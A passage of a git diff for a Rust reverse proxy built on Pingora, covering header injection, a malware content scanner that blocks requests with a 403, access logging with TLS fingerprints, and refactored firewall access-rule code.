ctx.upstream_peer.as_ref() { + upstream_request.insert_header("X-Forwarded-For", peer.address.as_str())?; + } + + // Apply configured request headers from upstreams.yaml (will override default Host if present) + if let Some(hostname) = ctx.hostname.as_ref() { + let path = _session.req_header().uri.path(); + if let Some(configured_headers) = self.get_request_headers(hostname, path) { + for (key, value) in configured_headers { + // insert_header will override existing headers with the same name + let key_clone = key.clone(); + let value_clone = value.clone(); + if let Err(e) = upstream_request.insert_header(key_clone, value_clone) { + debug!("Failed to insert request header {}: {}", key, e); + } + } + } + } + + // Apply global request headers (headers to add to upstream requests) + let global_request_headers = self.global_request_headers.load(); + for (key, value) in global_request_headers.iter() { + if let Err(e) = upstream_request.insert_header(key.clone(), value.clone()) { + debug!("Failed to insert global request header {}: {}", key, e); + } + } + + Ok(()) + } + + async fn request_body_filter( + &self, + _session: &mut Session, + body: &mut Option, + end_of_stream: bool, + ctx: &mut Self::CTX, + ) -> Result<()> + where + Self::CTX: Send + Sync, + { + // Accumulate request body for content scanning + // Copy the body data but don't take it - Pingora will forward it if no malware + if let Some(body_bytes) = body { + info!( + "BODY CHUNK received: {} bytes, total so far: {}, end_of_stream: {}", + body_bytes.len(), + ctx.request_body.len() + body_bytes.len(), + end_of_stream + ); + ctx.request_body.extend_from_slice(body_bytes); + } + + if end_of_stream && !ctx.request_body.is_empty() { + if let Some(scanner) = + crate::security::waf::actions::content_scanning::get_global_content_scanner() + { + // Only scan if enabled and body is within size limits + if !scanner.is_enabled() { + return Ok(()); + } + + if ctx.request_body.len() > scanner.max_file_size() { + debug!( + "Content scanner: skipping scan - body size {} exceeds max {}", + ctx.request_body.len(), + scanner.max_file_size() + ); + return Ok(()); + } + + let req_header = _session.req_header(); + let method = req_header.method.as_str(); + let uri = req_header.uri.to_string(); + + info!( + "Content scanner: scanning request body (size: {} bytes)", + ctx.request_body.len() + ); + + // Check if content-type is multipart and scan accordingly + let content_type = req_header + .headers + .get("content-type") + .and_then(|h| h.to_str().ok()); + + let scan_result = if let Some(ct) = content_type { + if let Some(boundary) = + crate::security::waf::actions::content_scanning::extract_multipart_boundary( + ct, + ) + { + info!( + "Detected multipart content with boundary: '{}', scanning parts individually", + boundary + ); + scanner + .scan_multipart_content(&ctx.request_body, &boundary) + .await + } else { + scanner.scan_content(&ctx.request_body).await + } + } else { + scanner.scan_content(&ctx.request_body).await + }; + + match scan_result { + Ok(scan_result) => { + if scan_result.malware_detected { + info!( + "Malware detected in request: {} {} - signature: {:?}", + method, uri, scan_result.signature + ); + + // Mark malware detected in context + ctx.malware_detected = true; + + // Send 403 response immediately to block the request + let json_response = serde_json::json!({ + "success": false, + "error": "Request blocked", + "reason": "malware_detected", + "message": "Malware detected in request" + }); + let json_body = Bytes::from(json_response.to_string()); + + let mut header = ResponseHeader::build(403, None)?; + header.insert_header("Content-Type", "application/json")?; + header.insert_header("X-Content-Scan-Result", "malware_detected")?; + + _session.set_keepalive(None); + _session + .write_response_header(Box::new(header), false) + .await?; + _session.write_response_body(Some(json_body), true).await?; + + ctx.malware_response_sent = true; + + // Return error to abort the request + return Err(Box::new(Error { + etype: HTTPStatus(403), + esource: ErrorSourceInternal, + retry: RetryType::Decided(false), + cause: None, + context: Option::from(ImmutStr::Static("Malware detected")), + })); + } else { + debug!("Content scan completed: no malware detected"); + } + } + Err(e) => { + warn!("Content scanning failed: {}", e); + // On scanning error, allow the request to proceed (fail open) + } + } + } + } + + Ok(()) + } + + async fn response_filter( + &self, + session: &mut Session, + _upstream_response: &mut ResponseHeader, + ctx: &mut Self::CTX, + ) -> Result<()> { + // Calculate upstream response time + if let Some(upstream_start) = ctx.upstream_start_time { + ctx.upstream_time = Some(upstream_start.elapsed()); + } + + // _upstream_response.insert_header("X-Proxied-From", "Fooooooooooooooo").unwrap(); + if ctx.extraparams.sticky_sessions { + let backend_id = ctx.backend_id.clone(); + if let Some(bid) = self.ump_byid.get(&backend_id) { + let _ = _upstream_response.insert_header( + "set-cookie", + format!( + "backend_id={}; Path=/; Max-Age=600; HttpOnly; SameSite=Lax", + bid.address + ), + ); + } + } + // Apply configured response headers from upstreams.yaml + match ctx.hostname.as_ref() { + Some(host) => { + let path = session.req_header().uri.path(); + let host_header = host; + let split_header = host_header.split_once(':'); + + match split_header { + Some(sh) => { + if let Some(response_headers) = self.get_response_headers(sh.0, path) { + for (key, value) in response_headers { + if let Err(e) = + _upstream_response.insert_header(key.clone(), value.clone()) + { + warn!( + "Failed to insert response header {}: {}, preserving original upstream status code", + key, e + ); + } + } + } + } + None => { + if let Some(response_headers) = self.get_response_headers(host_header, path) + { + for (key, value) in response_headers { + if let Err(e) = + _upstream_response.insert_header(key.clone(), value.clone()) + { + warn!( + "Failed to insert response header {}: {}, preserving original upstream status code", + key, e + ); + } + } + } + } + } + } + None => {} + } + + // Apply global response headers (headers to add to responses) + let global_response_headers = self.global_response_headers.load(); + for (key, value) in global_response_headers.iter() { + if let Err(e) = _upstream_response.insert_header(key.clone(), value.clone()) { + warn!( + "Failed to insert global response header {}: {}, preserving original upstream status code", + key, e + ); + } + } + + session.set_keepalive(Some(300)); + Ok(()) + } + + async fn fail_to_proxy( + &self, + session: &mut Session, + e: &Error, + ctx: &mut Self::CTX, + ) -> FailToProxy + where + Self::CTX: Send + Sync, + { + let error_type_str = e.etype().as_str(); + let error_source_str = match e.esource() { + pingora_core::ErrorSource::Upstream => "Upstream", + pingora_core::ErrorSource::Downstream => "Downstream", + pingora_core::ErrorSource::Internal => "Internal", + pingora_core::ErrorSource::Unset => "Unset", + }; + let error_msg = e.to_string(); + // Determine appropriate HTTP status code based on error type + let code = match e.etype() { + HTTPStatus(code) => *code, + ErrorType::ConnectTimedout | ErrorType::ReadTimedout | ErrorType::WriteTimedout => { + // Connection/read/write timeouts -> 504 Gateway Timeout + 504 + } + ErrorType::ConnectRefused | ErrorType::ConnectNoRoute => { + // Connection refused or no route -> 503 Service Unavailable + 503 + } + ErrorType::InvalidHTTPHeader | ErrorType::H2Error | ErrorType::InvalidH2 => { + // Invalid HTTP headers or HTTP/2 errors -> 400 Bad Request + 400 + } + _ => { + // For other upstream errors, determine based on error source + match e.esource() { + pingora_core::ErrorSource::Upstream => { + // Unknown upstream error -> 502 Bad Gateway + 502 + } + pingora_core::ErrorSource::Downstream => { + match e.etype() { + ErrorType::WriteError + | ErrorType::ReadError + | ErrorType::ConnectionClosed => { + // Connection already dead + 0 + } + _ => 400, + } + } + pingora_core::ErrorSource::Internal | pingora_core::ErrorSource::Unset => 500, + } + } + }; + + ctx.error_details = Some(crate::logger::access_log::ErrorDetails { + source: error_source_str.to_lowercase(), + error_type: error_type_str.to_string(), + message: error_msg.clone(), + }); + + // Send error response to downstream if code is valid + if code > 0 { + if let Err(resp_err) = session.respond_error(code).await { + let _ = resp_err; + } + } + + FailToProxy { + error_code: code, + // Default to no reuse, which is safest + can_reuse_downstream: false, + } + } + + async fn logging( + &self, + session: &mut Session, + _e: Option<&pingora_core::Error>, + ctx: &mut Self::CTX, + ) { + let response_code = if let Some(resp) = session.response_written() { + resp.status.as_u16() + } else if let Some(err) = _e { + match err.etype() { + HTTPStatus(code) => *code, + ErrorType::ConnectTimedout | ErrorType::ReadTimedout | ErrorType::WriteTimedout => { + 504 + } + ErrorType::ConnectRefused | ErrorType::ConnectNoRoute => 503, + ErrorType::InvalidHTTPHeader | ErrorType::H2Error | ErrorType::InvalidH2 => 400, + _ => match err.esource() { + pingora_core::ErrorSource::Upstream => 502, + pingora_core::ErrorSource::Downstream => 400, + pingora_core::ErrorSource::Internal | pingora_core::ErrorSource::Unset => 500, + }, + } + } else { + 0 + }; + + // Skip logging if disabled for this endpoint + if ctx.disable_access_log { + return; + } + + debug!( + "{}, response code: {response_code}", + self.request_summary(session, ctx) + ); + + // Log TLS fingerprint if available + if let Some(ref fingerprint) = ctx.tls_fingerprint { + debug!( + "Request completed - JA4: {}, JA4_Raw: {}, TLS_Version: {}, Cipher: {:?}, SNI: {:?}, ALPN: {:?}, Response: {}", + fingerprint.ja4, + fingerprint.ja4_raw, + fingerprint.tls_version, + fingerprint.cipher_suite, + fingerprint.sni, + fingerprint.alpn, + response_code + ); + } + + let m = &crate::utils::metrics::MetricTypes { + method: session.req_header().method.to_string(), + code: session + .response_written() + .map(|resp| resp.status.as_str().to_owned()) + .unwrap_or("0".to_string()), + latency: ctx.start_time.elapsed(), + version: session.req_header().version, + }; + crate::utils::metrics::calc_metrics(m); + + // Create access log + if let (Some(peer_addr), Some(local_addr)) = ( + session.client_addr().and_then(|addr| addr.as_inet()), + session.server_addr().and_then(|addr| addr.as_inet()), + ) { + let peer_socket_addr = std::net::SocketAddr::new(peer_addr.ip(), peer_addr.port()); + let local_socket_addr = std::net::SocketAddr::new(local_addr.ip(), local_addr.port()); + + // Convert request headers to hyper::http::request::Parts + let mut request_builder = http::Request::builder() + .method(session.req_header().method.as_str()) + .uri(session.req_header().uri.to_string()) + .version(session.req_header().version); + + // Copy headers + for (name, value) in session.req_header().headers.iter() { + request_builder = request_builder.header(name, value); + } + + let hyper_request = request_builder.body(()).unwrap(); + let (req_parts, _) = hyper_request.into_parts(); + + // Convert request body to Bytes + let req_body_bytes = bytes::Bytes::from(ctx.request_body.clone()); + + let tls_present = session.stream().and_then(|s| s.get_ssl()).is_some(); + + // Try to get TLS fingerprint from context or retrieve it again + // Priority: 1) Context, 2) Retrieve from storage, 3) None + let tls_fp_for_log = if tls_present { + if let Some(tls_fp) = ctx.tls_fingerprint.as_ref() { + debug!( + "TLS fingerprint found in context - JA4: {}, JA4_unsorted: {}, SNI: {:?}, ALPN: {:?}", + tls_fp.ja4, tls_fp.ja4_unsorted, tls_fp.sni, tls_fp.alpn + ); + Some(tls_fp.clone()) + } else if let Some(peer_addr) = + session.client_addr().and_then(|addr| addr.as_inet()) + { + // Try to retrieve TLS fingerprint again if not in context + // Use fallback lookup to handle PROXY protocol address mismatches + let std_addr = + std::net::SocketAddr::new(peer_addr.ip().into(), peer_addr.port()); + if let Some(fingerprint) = + crate::utils::tls_client_hello::get_fingerprint_with_fallback(&std_addr) + { + debug!( + "TLS fingerprint retrieved from storage - JA4: {}, JA4_unsorted: {}, SNI: {:?}, ALPN: {:?}", + fingerprint.ja4, + fingerprint.ja4_unsorted, + fingerprint.sni, + fingerprint.alpn + ); + // Store in context for future use in this request + ctx.tls_fingerprint = Some(fingerprint.clone()); + Some(fingerprint) + } else { + debug!( + "No TLS fingerprint found in storage for peer: {} (this may be normal if ClientHello callback didn't fire or PROXY protocol is used)", + std_addr + ); + None + } + } else { + debug!("No peer address available for TLS fingerprint retrieval"); + None + } + } else { + None + }; + + // Get TCP fingerprint data (if available) + let tcp_fingerprint_data = if let Some(collector) = + crate::utils::fingerprint::tcp_fingerprint::get_global_tcp_fingerprint_collector() + { + collector.lookup_fingerprint(peer_addr.ip(), peer_addr.port()) + } else { + None + }; + + // Get server certificate info (if available) + // Try hostname first, then SNI from TLS fingerprint + let server_cert_info_opt = { + let hostname_to_use = ctx + .hostname + .as_ref() + .or_else(|| tls_fp_for_log.as_ref().and_then(|fp| fp.sni.as_ref())); + + if let Some(hostname) = hostname_to_use { + // Try to get certificate path from certificate store + let cert_path = if let Ok(store) = + crate::worker::certificate::get_certificate_store().try_read() + { + if let Some(certs) = store.as_ref() { + certs.get_cert_path_for_hostname(hostname) + } else { + None + } + } else { + None + }; + + // If certificate path found, extract certificate info + if let Some(cert_path) = cert_path { + crate::utils::tls::extract_cert_info(&cert_path) + } else { + None + } + } else { + None + } + }; + + // Build upstream info + let upstream_info = ctx.upstream_peer.as_ref().map(|peer| { + crate::logger::access_log::UpstreamInfo { + selected: peer.address.clone(), + method: "round_robin".to_string(), // TODO: Get actual method from config + reason: "healthy".to_string(), // TODO: Get actual reason + } + }); + + // Build performance info + let performance_info = crate::logger::access_log::PerformanceInfo { + request_time_ms: Some(ctx.start_time.elapsed().as_millis() as u64), + upstream_time_ms: ctx.upstream_time.map(|d| d.as_millis() as u64), + }; + + let error_details = ctx.error_details.clone().or_else(|| { + _e.map(|err| crate::logger::access_log::ErrorDetails { + source: match err.esource() { + pingora_core::ErrorSource::Upstream => "upstream".to_string(), + pingora_core::ErrorSource::Downstream => "downstream".to_string(), + pingora_core::ErrorSource::Internal => "internal".to_string(), + pingora_core::ErrorSource::Unset => "unset".to_string(), + }, + error_type: err.etype().as_str().to_string(), + message: err.to_string(), + }) + }); + + // Build response data + let response_data = crate::logger::access_log::ResponseData { + response_json: serde_json::json!({ + "status": response_code, + "status_text": session.response_written() + .and_then(|resp| resp.status.canonical_reason()) + .unwrap_or("Unknown"), + "content_type": session.response_written() + .and_then(|resp| resp.headers.get("content-type")) + .and_then(|h| h.to_str().ok()), + "content_length": session.response_written() + .and_then(|resp| resp.headers.get("content-length")) + .and_then(|h| h.to_str().ok()) + .and_then(|s| s.parse::().ok()) + .unwrap_or(0), + "body": "" // Response body not captured + }), + blocking_info: None, + waf_result: ctx.waf_result.clone(), + threat_data: ctx.threat_data.clone(), + }; + + // Extract SNI, ALPN, cipher, JA4, and JA4_unsorted from TLS fingerprint if available + // Use the same TLS fingerprint we retrieved above + let (tls_sni, tls_alpn, tls_cipher, tls_ja4, tls_ja4_unsorted) = if tls_present { + if let Some(tls_fp) = tls_fp_for_log.as_ref() { + let ja4 = Some(tls_fp.ja4.clone()); + let ja4_unsorted = Some(tls_fp.ja4_unsorted.clone()); + + debug!( + "TLS fingerprint found for logging - JA4: {:?}, JA4_unsorted: {:?}, SNI: {:?}, ALPN: {:?}, Cipher: {:?}", + ja4, ja4_unsorted, tls_fp.sni, tls_fp.alpn, tls_fp.cipher_suite + ); + + ( + tls_fp.sni.clone(), + tls_fp.alpn.clone(), + tls_fp.cipher_suite.clone(), + ja4, + ja4_unsorted, + ) + } else { + debug!( + "No TLS fingerprint found for logging - peer: {:?} (JA4/JA4_unsorted will be null)", + peer_addr + ); + (None, None, None, None, None) + } + } else { + (None, None, None, None, None) + }; + + // Create access log with upstream and performance info + // Note: tls_fingerprint parameter is for Ja4hFingerprint (HTTP header fingerprint), + // but we pass None since the function generates its own JA4H from headers. + // TLS info is passed via the separate tls_sni, tls_alpn, tls_cipher, tls_ja4, tls_ja4_unsorted parameters. + if let Err(e) = crate::logger::access_log::HttpAccessLog::create_from_parts( + &req_parts, + &req_body_bytes, + peer_socket_addr, + local_socket_addr, + tls_present, + !matches!( + _e.map(|err| err.etype()), + Some(ErrorType::InvalidHTTPHeader | ErrorType::H2Error | ErrorType::InvalidH2) + ), + None, // Ja4hFingerprint is generated from HTTP headers inside the function + tcp_fingerprint_data.as_ref(), + server_cert_info_opt.as_ref(), + response_data, + error_details, + ctx.waf_result.as_ref(), + ctx.threat_data.as_ref(), + upstream_info, + Some(performance_info), + tls_sni, + tls_alpn, + tls_cipher, + tls_ja4, + tls_ja4_unsorted, + ) + .await + { + warn!("Failed to create access log: {}", e); + } + } + } + + fn response_body_filter( + &self, + _session: &mut Session, + _body: &mut Option, + _end_of_stream: bool, + _ctx: &mut Self::CTX, + ) -> Result> { + Ok(None) + } +} + +impl LB {} + +fn return_header_host(session: &Session) -> Option { + if session.is_http2() { + match session.req_header().uri.host() { + Some(host) => Option::from(host.to_string()), + None => None, + } + } else { + match session.req_header().headers.get("host") { + Some(host) => { + let header_host = host.to_str().unwrap().splitn(2, ':').collect::>(); + Option::from(header_host[0].to_string()) + } + None => None, + } + } +} diff --git a/src/http_proxy/start.rs b/src/proxy/start.rs similarity index 79% rename from src/http_proxy/start.rs rename to src/proxy/start.rs index bf20614..ce52f47 100644 --- a/src/http_proxy/start.rs +++ b/src/proxy/start.rs @@ -1,5 +1,5 @@ // use rustls::crypto::ring::default_provider; -use crate::http_proxy::proxyhttp::LB; +use crate::proxy::proxyhttp::LB; use crate::utils::structs::Extraparams; use crate::utils::tls; use crate::utils::tls::CertificateConfig; @@ -9,22 +9,22 @@ use ctrlc; use dashmap::DashMap; use log::{debug, info, warn}; use pingora_core::listeners::tls::TlsSettings; -use pingora_core::prelude::{background_service, Opt}; +use pingora_core::prelude::{Opt, background_service}; use pingora_core::server::Server; use std::fs; use std::process; -use std::sync::mpsc::{channel, Receiver, Sender}; use std::sync::Arc; +use std::sync::mpsc::{Receiver, Sender, channel}; use std::thread; pub fn run() { run_with_config(None) } -pub fn run_with_config(config: Option) { +pub fn run_with_config(config: Option) { // default_provider().install_default().expect("Failed to install rustls crypto provider"); let maincfg = if let Some(cfg) = config { - cfg.pingora.to_app_config() + cfg.proxy.to_app_config() } else { // Fallback to old parsing method for backward compatibility let parameters = Some(Opt::parse_args()).unwrap(); @@ -34,12 +34,7 @@ pub fn run_with_config(config: Option) { // Skip old proxy system if no proxy addresses are configured (using new config format) if maincfg.proxy_address_http.is_empty() { - info!("Pingora proxy system disabled (no proxy_address_http configured)"); - info!( - "Using new HTTP server on: {}:{}", - maincfg.proxy_address_http, - maincfg.proxy_port_tls.unwrap_or(443) - ); + info!("Pingora proxy system disabled (no proxy.address_http configured)"); return; } @@ -61,7 +56,9 @@ pub fn run_with_config(config: Option) { if proxy_protocol_enabled { info!("PROXY protocol support enabled - Pingora will parse headers before HTTP/TLS"); info!("WARNING: All incoming connections must include PROXY protocol headers when enabled"); - info!("Direct connections without PROXY headers will fail. Ensure load balancer sends PROXY headers."); + info!( + "Direct connections without PROXY headers will fail. Ensure load balancer sends PROXY headers." + ); info!("PROXY protocol will be parsed before TLS handshake for secure connections"); // Enable PROXY protocol globally in Pingora pingora_core::protocols::proxy_protocol::set_proxy_protocol_enabled(true); @@ -75,7 +72,9 @@ pub fn run_with_config(config: Option) { let uf_config = Arc::new(DashMap::new()); let ff_config = Arc::new(DashMap::new()); let im_config = Arc::new(DashMap::new()); - let hh_config = Arc::new(DashMap::new()); + let hh_config = Arc::new(DashMap::new()); // Legacy: kept for backward compatibility + let request_headers_config = Arc::new(DashMap::new()); + let response_headers_config = Arc::new(DashMap::new()); let ap_config = Arc::new(DashMap::new()); let ec_config = Arc::new(ArcSwap::from_pointee(Extraparams { @@ -94,9 +93,13 @@ pub fn run_with_config(config: Option) { ump_upst: uf_config, ump_full: ff_config, ump_byid: im_config, - arxignis_paths: ap_config, + internal_paths: ap_config, config: cfg.clone(), - headers: hh_config, + headers: hh_config, // Legacy: kept for backward compatibility + request_headers: request_headers_config, + response_headers: response_headers_config, + global_request_headers: Arc::new(ArcSwap::from_pointee(Vec::new())), // Will be populated by bgservice + global_response_headers: Arc::new(ArcSwap::from_pointee(Vec::new())), // Will be populated by bgservice extraparams: ec_config, tcp_fingerprint_collector: None, // TODO: Pass from main.rs if available certificates: Some(certificates_arc.clone()), @@ -118,8 +121,10 @@ pub fn run_with_config(config: Option) { match bind_address_tls { Some(bind_address_tls) => { crate::utils::tools::check_priv(bind_address_tls.as_str()); - let (tx, rx): (Sender>, Receiver>) = - channel(); + let (tx, rx): ( + Sender>, + Receiver>, + ) = channel(); let certs_path = cfg.proxy_certificates.clone().unwrap(); // Check if directory exists before watching @@ -134,7 +139,10 @@ pub fn run_with_config(config: Option) { } }); } else { - warn!("Certificate directory does not exist: {}. TLS will be disabled until certificates are added.", certs_path); + warn!( + "Certificate directory does not exist: {}. TLS will be disabled until certificates are added.", + certs_path + ); // Send empty configs so receiver doesn't block if tx.send(vec![]).is_err() { warn!("Failed to send initial certificate configs"); @@ -145,7 +153,10 @@ pub fn run_with_config(config: Option) { let certificate_configs = match rx.recv() { Ok(configs) => configs, Err(e) => { - warn!("Failed to receive certificate configs: {:?}. TLS will be disabled.", e); + warn!( + "Failed to receive certificate configs: {:?}. TLS will be disabled.", + e + ); vec![] } }; @@ -156,8 +167,9 @@ pub fn run_with_config(config: Option) { cfg.default_certificate.as_ref(), ) { let first_set_arc: Arc = Arc::new(first_set); - certificates_arc.store(Arc::new(Some(first_set_arc.clone()) - as Option>)); + certificates_arc.store(Arc::new( + Some(first_set_arc.clone()) as Option> + )); // Set global certificates for SNI callback tls::set_global_certificates(first_set_arc.clone()); @@ -178,11 +190,9 @@ pub fn run_with_config(config: Option) { "Failed to create TlsSettings with SNI callback: {}, falling back to default", e ); - let mut settings = TlsSettings::intermediate( - &default_cert_path, - &default_key_path, - ) - .expect("unable to load or parse cert/key"); + let mut settings = + TlsSettings::intermediate(&default_cert_path, &default_key_path) + .expect("unable to load or parse cert/key"); tls::set_tsl_grade(&mut settings, grade.as_str()); tls::set_alpn_prefer_h2(&mut settings); settings @@ -230,7 +240,9 @@ pub fn run_with_config(config: Option) { }, )); if proxy_protocol_enabled { - info!("TLS ClientHello callback registered for fingerprint generation (PROXY protocol enabled - some extraction failures are expected and non-fatal)"); + info!( + "TLS ClientHello callback registered for fingerprint generation (PROXY protocol enabled - some extraction failures are expected and non-fatal)" + ); } else { info!("TLS ClientHello callback registered for fingerprint generation"); } @@ -238,15 +250,20 @@ pub fn run_with_config(config: Option) { proxy.add_tls_with_settings(&bind_address_tls, None, tls_settings); } else { - info!("TLS listener disabled: no certificates found in directory. TLS will be enabled when certificates are added."); + info!( + "TLS listener disabled: no certificates found in directory. TLS will be enabled when certificates are added." + ); } let certs_for_watcher = certificates_arc.clone(); let default_cert_for_watcher = cfg.default_certificate.clone(); thread::spawn(move || { while let Ok(new_configs) = rx.recv() { - let new_certs = - tls::Certificates::new(&new_configs, grade.as_str(), default_cert_for_watcher.as_ref()); + let new_certs = tls::Certificates::new( + &new_configs, + grade.as_str(), + default_cert_for_watcher.as_ref(), + ); if let Some(new_certs) = new_certs { certs_for_watcher.store(Arc::new(Some(Arc::new(new_certs)))); } @@ -256,7 +273,6 @@ pub fn run_with_config(config: Option) { None => {} } - info!("Running HTTP listener on :{}", bind_address_http.as_str()); proxy.add_tcp(bind_address_http.as_str()); server.add_service(proxy); @@ -278,8 +294,7 @@ pub fn run_with_config(config: Option) { let _ = tx.send(()); }) .expect("Error setting Ctrl-C handler"); - rx.recv() - .expect("Could not receive from channel."); + rx.recv().expect("Could not receive from channel."); info!("Signal received ! Exiting..."); process::exit(0); } diff --git a/src/access_rules.rs b/src/security/access_rules.rs similarity index 83% rename from src/access_rules.rs rename to src/security/access_rules.rs index 22e5653..ded01ab 100644 --- a/src/access_rules.rs +++ b/src/security/access_rules.rs @@ -1,14 +1,13 @@ use std::collections::HashSet; -use std::net::{Ipv4Addr, Ipv6Addr, IpAddr}; +use std::net::{IpAddr, Ipv4Addr, Ipv6Addr}; use std::str::FromStr; use std::sync::{Arc, Mutex, OnceLock}; -use crate::bpf; +use crate::firewall::{Firewall, IptablesFirewall, NftablesFirewall, SYNAPSEFirewall}; +use crate::security::waf::wirefilter::update_http_filter_from_config_value; +use crate::utils::http_utils::{is_ip_in_cidr, parse_ip_or_cidr}; use crate::worker::config; use crate::worker::config::global_config; -use crate::waf::wirefilter::update_http_filter_from_config_value; -use crate::firewall::{Firewall, SYNAPSEFirewall, NftablesFirewall, IptablesFirewall}; -use crate::utils::http_utils::{parse_ip_or_cidr, is_ip_in_cidr}; // Store previous rules state for comparison type PreviousRules = Arc>>; @@ -28,17 +27,22 @@ fn get_previous_rules_v6() -> &'static PreviousRulesV6 { /// Apply access rules once using the current global config snapshot (initial setup) pub fn init_access_rules_from_global( - skels: &Vec>>, + skels: &Vec>>, ) -> Result<(), Box> { if skels.is_empty() { return Ok(()); } if let Ok(guard) = global_config().read() { if let Some(cfg_arc) = guard.as_ref() { - let previous_rules: PreviousRules = Arc::new(Mutex::new(std::collections::HashSet::new())); - let previous_rules_v6: PreviousRulesV6 = Arc::new(Mutex::new(std::collections::HashSet::new())); + let previous_rules: PreviousRules = + Arc::new(Mutex::new(std::collections::HashSet::new())); + let previous_rules_v6: PreviousRulesV6 = + Arc::new(Mutex::new(std::collections::HashSet::new())); // Use Arc clone instead of full Config clone for efficiency - let resp = config::ConfigApiResponse { success: true, config: (**cfg_arc).clone() }; + let resp = config::ConfigApiResponse { + success: true, + config: (**cfg_arc).clone(), + }; apply_rules(skels, &resp, &previous_rules, &previous_rules_v6)?; } } @@ -49,7 +53,7 @@ pub fn init_access_rules_from_global( /// This is called periodically by the ConfigWorker after it fetches new config /// Set `skip_waf_update` to true in agent mode to skip WAF wirefilter updates pub fn apply_rules_from_global( - skels: &Vec>>, + skels: &Vec>>, previous_rules: &PreviousRules, previous_rules_v6: &PreviousRulesV6, skip_waf_update: bool, @@ -69,7 +73,10 @@ pub fn apply_rules_from_global( // Use Arc clone instead of full Config clone for efficiency apply_rules( skels, - &config::ConfigApiResponse { success: true, config: (**cfg_arc).clone() }, + &config::ConfigApiResponse { + success: true, + config: (**cfg_arc).clone(), + }, previous_rules, previous_rules_v6, )?; @@ -83,10 +90,15 @@ pub fn apply_rules_from_global( /// This is called by the ConfigWorker after it fetches new config /// Set `skip_waf_update` to true in agent mode to skip WAF wirefilter updates pub fn apply_rules_from_global_with_state( - skels: &Vec>>, + skels: &Vec>>, skip_waf_update: bool, ) -> Result<(), Box> { - apply_rules_from_global(skels, get_previous_rules(), get_previous_rules_v6(), skip_waf_update) + apply_rules_from_global( + skels, + get_previous_rules(), + get_previous_rules_v6(), + skip_waf_update, + ) } /// Apply access rules using nftables firewall backend @@ -98,7 +110,10 @@ pub fn apply_rules_nftables( ) -> Result<(), Box> { if let Ok(guard) = global_config().read() { if let Some(cfg_arc) = guard.as_ref() { - let resp = config::ConfigApiResponse { success: true, config: (**cfg_arc).clone() }; + let resp = config::ConfigApiResponse { + success: true, + config: (**cfg_arc).clone(), + }; apply_rules_to_nftables(nft_fw, &resp, previous_rules, previous_rules_v6)?; } } @@ -186,8 +201,12 @@ fn apply_rules_to_nftables( } // Lock previous rules - let mut previous_rules_guard = previous_rules.lock().map_err(|e| format!("Lock error: {}", e))?; - let mut previous_rules_v6_guard = previous_rules_v6.lock().map_err(|e| format!("Lock error: {}", e))?; + let mut previous_rules_guard = previous_rules + .lock() + .map_err(|e| format!("Lock error: {}", e))?; + let mut previous_rules_v6_guard = previous_rules_v6 + .lock() + .map_err(|e| format!("Lock error: {}", e))?; // Check for changes let ipv4_changed = current_rules != *previous_rules_guard; @@ -200,10 +219,22 @@ fn apply_rules_to_nftables( // Compute diffs let prev_v4_snapshot = previous_rules_guard.clone(); let prev_v6_snapshot = previous_rules_v6_guard.clone(); - let removed_v4: Vec<(Ipv4Addr, u32)> = prev_v4_snapshot.difference(¤t_rules).cloned().collect(); - let added_v4: Vec<(Ipv4Addr, u32)> = current_rules.difference(&prev_v4_snapshot).cloned().collect(); - let removed_v6: Vec<(Ipv6Addr, u32)> = prev_v6_snapshot.difference(¤t_rules_v6).cloned().collect(); - let added_v6: Vec<(Ipv6Addr, u32)> = current_rules_v6.difference(&prev_v6_snapshot).cloned().collect(); + let removed_v4: Vec<(Ipv4Addr, u32)> = prev_v4_snapshot + .difference(¤t_rules) + .cloned() + .collect(); + let added_v4: Vec<(Ipv4Addr, u32)> = current_rules + .difference(&prev_v4_snapshot) + .cloned() + .collect(); + let removed_v6: Vec<(Ipv6Addr, u32)> = prev_v6_snapshot + .difference(¤t_rules_v6) + .cloned() + .collect(); + let added_v6: Vec<(Ipv6Addr, u32)> = current_rules_v6 + .difference(&prev_v6_snapshot) + .cloned() + .collect(); // Apply to nftables let mut fw = nft_fw.lock().map_err(|e| format!("Lock error: {}", e))?; @@ -219,8 +250,12 @@ fn apply_rules_to_nftables( log::error!("nftables: IPv4 ban failed for {}/{}: {}", net, prefix, e); } } - log::debug!("nftables: Applied {} IPv4 rule changes (+{}, -{})", - added_v4.len() + removed_v4.len(), added_v4.len(), removed_v4.len()); + log::debug!( + "nftables: Applied {} IPv4 rule changes (+{}, -{})", + added_v4.len() + removed_v4.len(), + added_v4.len(), + removed_v4.len() + ); } if ipv6_changed { @@ -234,13 +269,21 @@ fn apply_rules_to_nftables( log::error!("nftables: IPv6 ban failed for {}/{}: {}", net, prefix, e); } } - log::debug!("nftables: Applied {} IPv6 rule changes (+{}, -{})", - added_v6.len() + removed_v6.len(), added_v6.len(), removed_v6.len()); + log::debug!( + "nftables: Applied {} IPv6 rule changes (+{}, -{})", + added_v6.len() + removed_v6.len(), + added_v6.len(), + removed_v6.len() + ); } // Update previous snapshots - if ipv4_changed { *previous_rules_guard = current_rules; } - if ipv6_changed { *previous_rules_v6_guard = current_rules_v6; } + if ipv4_changed { + *previous_rules_guard = current_rules; + } + if ipv6_changed { + *previous_rules_v6_guard = current_rules_v6; + } Ok(()) } @@ -271,7 +314,10 @@ pub fn apply_rules_iptables( ) -> Result<(), Box> { if let Ok(guard) = global_config().read() { if let Some(cfg_arc) = guard.as_ref() { - let resp = config::ConfigApiResponse { success: true, config: (**cfg_arc).clone() }; + let resp = config::ConfigApiResponse { + success: true, + config: (**cfg_arc).clone(), + }; apply_rules_to_iptables(ipt_fw, &resp, previous_rules, previous_rules_v6)?; } } @@ -359,16 +405,32 @@ fn apply_rules_to_iptables( } // Get previous rules - let mut previous_rules_guard = previous_rules.lock().map_err(|e| format!("Lock error: {}", e))?; - let mut previous_rules_v6_guard = previous_rules_v6.lock().map_err(|e| format!("Lock error: {}", e))?; + let mut previous_rules_guard = previous_rules + .lock() + .map_err(|e| format!("Lock error: {}", e))?; + let mut previous_rules_v6_guard = previous_rules_v6 + .lock() + .map_err(|e| format!("Lock error: {}", e))?; // Find IPs to add (in current but not in previous) - let to_add: Vec<_> = current_rules.difference(&*previous_rules_guard).cloned().collect(); - let to_add_v6: Vec<_> = current_rules_v6.difference(&*previous_rules_v6_guard).cloned().collect(); + let to_add: Vec<_> = current_rules + .difference(&*previous_rules_guard) + .cloned() + .collect(); + let to_add_v6: Vec<_> = current_rules_v6 + .difference(&*previous_rules_v6_guard) + .cloned() + .collect(); // Find IPs to remove (in previous but not in current) - let to_remove: Vec<_> = 